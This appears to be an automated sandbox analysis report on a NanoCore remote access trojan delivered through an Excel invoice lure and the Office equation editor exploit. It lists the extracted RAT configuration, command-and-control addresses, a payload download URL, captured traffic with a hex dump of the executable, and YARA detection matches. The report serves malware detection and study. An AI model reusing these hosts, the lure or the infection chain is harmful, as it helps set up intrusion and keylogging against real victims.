Malware Configuration Extractor: NanoCore {"Version": "1.2.2.0", "Mutex": "f57d5a77-8670-45ef-b736-5f3a07b6", "Group": "Addora", "Domain1": "79.134.225.30", "Domain2": "nassiru1155.ddns.net", "Port": 1144, "KeyboardLogging": "Enable", "RunOnStartup": "Enable", "RequestElevation": "Disable", "BypassUAC": "Disable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4"}

Multi AV Scanner detection for domain / URL

Show sources

Source: http://covid19vaccinations.hopto.org/nano.exe

Virustotal: Detection: 12%

Perma Link

Multi AV Scanner detection for submitted file

Show sources

Source: SOL2021-03-14-NETC-NI-21-049-CEVA INV.xlsx	Virustotal: Detection: 29%			Perma Link
Source: SOL2021-03-14-NETC-NI-21-049-CEVA INV.xlsx	ReversingLabs: Detection: 22%

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 00000007.00000002.2394028902.0000000000840000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2197311253.00000000036A1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2395217863.00000000037E6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2393666781.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 2480, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 2696, type: MEMORY
Source: Yara match	File source: 7.2.RegSvcs.exe.380d42c.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.3890588.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.840000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.3890588.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.38085f6.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.844629.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.3811a55.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.840000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.380d42c.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.37494e8.4.raw.unpack, type: UNPACKEDPE

Machine Learning detection for dropped file

Show sources

Source: C:\Users\Public\vbc.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\nano[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\gmSlQSien.exe	Joe Sandbox ML: detected

Source: 7.2.RegSvcs.exe.400000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 7.2.RegSvcs.exe.840000.3.unpack	Avira: Label: TR/NanoCore.fadte

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe			Jump to behavior

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: System.pdbWindows\exe\RegSvcs.pdb source: RegSvcs.exe, 00000007.00000002.2393642149.00000000003D6000.00000004.00000040.sdmp
Source:	Binary string: ystem.pdb- source: RegSvcs.exe, 00000007.00000002.2393642149.00000000003D6000.00000004.00000040.sdmp
Source:	Binary string: =T3UpC:\Windows\System.pdbA!`y source: RegSvcs.exe, 00000007.00000002.2395879525.0000000004FDC000.00000004.00000001.sdmp
Source:	Binary string: C:\Windows\RegSvcs.pdbN source: RegSvcs.exe, 00000007.00000002.2393642149.00000000003D6000.00000004.00000040.sdmp
Source:	Binary string: ps.pdb source: RegSvcs.exe, 00000007.00000002.2394056812.00000000008BD000.00000004.00000001.sdmp
Source:	Binary string: C:\Windows\dll\System.pdb source: RegSvcs.exe, 00000007.00000002.2393642149.00000000003D6000.00000004.00000040.sdmp
Source:	Binary string: System.EnterpriseServices.Wrapper.pdb source: smtpsvc.exe, 00000008.00000002.2225121272.0000000001D90000.00000002.00000001.sdmp
Source:	Binary string: C:\Windows\System.pdb``[ source: RegSvcs.exe, 00000007.00000002.2393642149.00000000003D6000.00000004.00000040.sdmp
Source:	Binary string: RegSvcs.pdb source: RegSvcs.exe, 00000007.00000003.2194043943.00000000006E3000.00000004.00000001.sdmp, smtpsvc.exe, smtpsvc.exe.7.dr
Source:	Binary string: indows\System.pdbpdbtem.pdb source: RegSvcs.exe, 00000007.00000002.2393642149.00000000003D6000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\symbols\dll\System.pdb source: RegSvcs.exe, 00000007.00000002.2393642149.00000000003D6000.00000004.00000040.sdmp
Source:	Binary string: System.pdb source: RegSvcs.exe, 00000007.00000002.2393642149.00000000003D6000.00000004.00000040.sdmp
Source:	Binary string: System.pdb8 source: RegSvcs.exe, 00000007.00000002.2393642149.00000000003D6000.00000004.00000040.sdmp
Source:	Binary string: mscorrc.pdb source: vbc.exe, 00000004.00000002.2194187602.0000000000B10000.00000002.00000001.sdmp, RegSvcs.exe, 00000007.00000002.2394185585.0000000002130000.00000002.00000001.sdmp
Source:	Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdb source: RegSvcs.exe, 00000007.00000002.2393642149.00000000003D6000.00000004.00000040.sdmp

Source: excel.exe

Memory has grown: Private usage: 4MB later: 73MB

Source: C:\Users\Public\vbc.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h	4_2_00B762C8
Source: C:\Users\Public\vbc.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h	4_2_00B76408
Source: C:\Users\Public\vbc.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h	4_2_00B763F8

Source: global traffic

DNS query: name: covid19vaccinations.hopto.org

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 13.235.115.155:80

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 13.235.115.155:80

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor	URLs: nassiru1155.ddns.net
Source: Malware configuration extractor	URLs: 79.134.225.30

Uses dynamic DNS services

Show sources

Source: unknown

DNS query: name: nassiru1155.ddns.net

Source: global traffic

TCP traffic: 192.168.2.22:49168 -> 79.134.225.30:1144

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 12 Apr 2021 06:02:45 GMTServer: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.4.16Last-Modified: Mon, 12 Apr 2021 05:41:25 GMTETag: "c3e00-5bfbff6ea5e4b"Accept-Ranges: bytesContent-Length: 802304Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 85 dd 73 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 32 0b 00 00 0a 01 00 00 00 00 00 92 50 0b 00 00 20 00 00 00 60 0b 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 0c 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 40 50 0b 00 4f 00 00 00 00 60 0b 00 ec 07 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 0c 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 98 30 0b 00 00 20 00 00 00 32 0b 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 ec 07 01 00 00 60 0b 00 00 08 01 00 00 34 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 0c 00 00 02 00 00 00 3c 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 74 50 0b 00 00 00 00 00 48 00 00 00 02 00 05 00 1c 7d 00 00 64 75 00 00 03 00 00 00 01 00 00 06 80 f2 00 00 c0 5d 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 30 02 00 1f 00 00 00 00 00 00 00 00 00 28 1e 00 00 0a 28 1f 00 00 0a 00 de 02 00 dc 00 28 07 00 00 06 02 6f 20 00 00 0a 00 2a 00 01 10 00 00 02 00 01 00 0e 0f 00 02 00 00 00 00 aa 00 02 16 28 21 00 00 0a 00 02 16 28 22 00 00 0a 00 02 17 28 23 00 00 0a 00 02 16 28 24 00 00 0a 00 02 16 28 25 00 00 0a 00 2a 4e 00 02 28 09 00 00 06 6f ed 00 00 06 28 26 00 00 0a 00 2a 26 00 02 28 27 00 00 0a 00 2a ce 73 28 00 00 0a 80 01 00 00 04 73 29 00 00 0a 80 02 00 00 04 73 2a 00 00 0a 80 03 00 00 04 73 2b 00 00 0a 80 04 00 00 04 73 2c 00 00 0a 80 05 00 00 04 2a 00 00 00 13 30 01 00 10 00 00 00 01 00 00 11 00 7e 01 00 00 04 6f 2d 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 02 00 00 11 00 7e 02 00 00 04 6f 2e 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 03 00 00 11 00 7e 03 00 00 04 6f 2f 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 04 00 00 11 00 7e 04 00 00 04 6f 30 00 00 0a 0

Source: Joe Sandbox View

IP Address: 79.134.225.30 79.134.225.30

Source: Joe Sandbox View	ASN Name: AMAZON-02US AMAZON-02US
Source: Joe Sandbox View	ASN Name: FINK-TELECOM-SERVICESCH FINK-TELECOM-SERVICESCH

Source: global traffic

HTTP traffic detected: GET /nano.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: covid19vaccinations.hopto.orgConnection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.30
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.30
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.30
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.30
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.30
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.30
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.30
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.30
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.30
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.30
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.30
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.30
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.30
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.30

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D3B54A74.emf

Jump to behavior

Source: global traffic

Source: unknown

DNS traffic detected: queries for: covid19vaccinations.hopto.org

Source: vbc.exe, 00000004.00000002.2202209803.0000000005540000.00000002.00000001.sdmp, RegSvcs.exe, 00000007.00000002.2395892834.0000000004FE0000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: vbc.exe, 00000004.00000002.2202209803.0000000005540000.00000002.00000001.sdmp, RegSvcs.exe, 00000007.00000002.2395892834.0000000004FE0000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: vbc.exe, 00000004.00000002.2197072541.00000000026A1000.00000004.00000001.sdmp	String found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css

Source: RegSvcs.exe, 00000007.00000002.2394028902.0000000000840000.00000004.00000001.sdmp

Binary or memory string: RegisterRawInputDevices

E-Banking Fraud:

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 00000007.00000002.2394028902.0000000000840000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2197311253.00000000036A1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2395217863.00000000037E6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2393666781.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 2480, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 2696, type: MEMORY
Source: Yara match	File source: 7.2.RegSvcs.exe.380d42c.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.3890588.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.840000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.3890588.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.38085f6.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.844629.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.3811a55.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.840000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.380d42c.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.37494e8.4.raw.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 00000007.00000002.2394028902.0000000000840000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000004.00000002.2197311253.00000000036A1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000004.00000002.2197311253.00000000036A1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000007.00000002.2393755361.00000000005C0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000007.00000002.2395217863.00000000037E6000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000007.00000002.2393666781.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000007.00000002.2393666781.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: vbc.exe PID: 2480, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: vbc.exe PID: 2480, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: RegSvcs.exe PID: 2696, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: RegSvcs.exe PID: 2696, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 7.2.RegSvcs.exe.380d42c.9.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 4.2.vbc.exe.3890588.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 4.2.vbc.exe.3890588.5.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 7.2.RegSvcs.exe.27d1644.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.RegSvcs.exe.840000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 4.2.vbc.exe.3890588.5.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 4.2.vbc.exe.3890588.5.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 7.2.RegSvcs.exe.38085f6.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.RegSvcs.exe.38085f6.8.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 7.2.RegSvcs.exe.844629.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.RegSvcs.exe.5c0000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 7.2.RegSvcs.exe.3811a55.10.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.RegSvcs.exe.840000.3.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.RegSvcs.exe.380d42c.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 4.2.vbc.exe.37494e8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 4.2.vbc.exe.37494e8.4.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>

Office equation editor drops PE file

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\nano[1].exe			Jump to dropped file

Source: C:\Users\Public\vbc.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior

Source: C:\Users\Public\vbc.exe	Code function: 4_2_006D088E NtQueryInformationProcess,	4_2_006D088E
Source: C:\Users\Public\vbc.exe	Code function: 4_2_006D1E96 NtQuerySystemInformation,	4_2_006D1E96
Source: C:\Users\Public\vbc.exe	Code function: 4_2_006D086C NtQueryInformationProcess,	4_2_006D086C
Source: C:\Users\Public\vbc.exe	Code function: 4_2_006D1E63 NtQuerySystemInformation,	4_2_006D1E63
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Code function: 7_2_004F144A NtQuerySystemInformation,	7_2_004F144A
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Code function: 7_2_004F140F NtQuerySystemInformation,	7_2_004F140F

Source: C:\Users\Public\vbc.exe	Code function: 4_2_011D85C8	4_2_011D85C8
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002E8418	4_2_002E8418
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002E6C48	4_2_002E6C48
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002E4450	4_2_002E4450
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002EED58	4_2_002EED58
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002E6550	4_2_002E6550
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002E75A8	4_2_002E75A8
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002E55D9	4_2_002E55D9
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002EDA30	4_2_002EDA30
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002E5210	4_2_002E5210
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002E5260	4_2_002E5260
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002EA739	4_2_002EA739
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002E4790	4_2_002E4790
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002EDCC8	4_2_002EDCC8
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002EB179	4_2_002EB179
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002E9170	4_2_002E9170
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002EA571	4_2_002EA571
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002EA140	4_2_002EA140
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002EA150	4_2_002EA150
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002E9180	4_2_002E9180
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002EA580	4_2_002EA580
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002E5980	4_2_002E5980
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002EE268	4_2_002EE268
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002EA339	4_2_002EA339
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002EA348	4_2_002EA348
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002E9BB0	4_2_002E9BB0
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002E9BC0	4_2_002E9BC0
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00B71078	4_2_00B71078
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00B739B8	4_2_00B739B8
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00B72FB8	4_2_00B72FB8
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00B743A0	4_2_00B743A0
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00B71500	4_2_00B71500
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00B73368	4_2_00B73368
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00B706C0	4_2_00B706C0
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00B706C8	4_2_00B706C8
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00B70070	4_2_00B70070
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00B71798	4_2_00B71798
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00B71789	4_2_00B71789
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00B74770	4_2_00B74770
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00B7497E	4_2_00B7497E
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00B74967	4_2_00B74967
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002E0A28	4_2_002E0A28
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Code function: 7_2_003C2418	7_2_003C2418
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Code function: 7_2_003CB410	7_2_003CB410
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Code function: 7_2_003C38C8	7_2_003C38C8
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Code function: 7_2_003C8AE8	7_2_003C8AE8
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Code function: 7_2_003C3020	7_2_003C3020
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Code function: 7_2_003C9807	7_2_003C9807
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Code function: 7_2_003C30E7	7_2_003C30E7
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Code function: 7_2_003C9740	7_2_003C9740

Source: SOL2021-03-14-NETC-NI-21-049-CEVA INV.xlsx

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Source: nano[1].exe.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: nano[1].exe.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: nano[1].exe.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: gmSlQSien.exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: gmSlQSien.exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: gmSlQSien.exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: 00000007.00000002.2394028902.0000000000840000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000007.00000002.2394028902.0000000000840000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000004.00000002.2197311253.00000000036A1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000004.00000002.2197311253.00000000036A1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
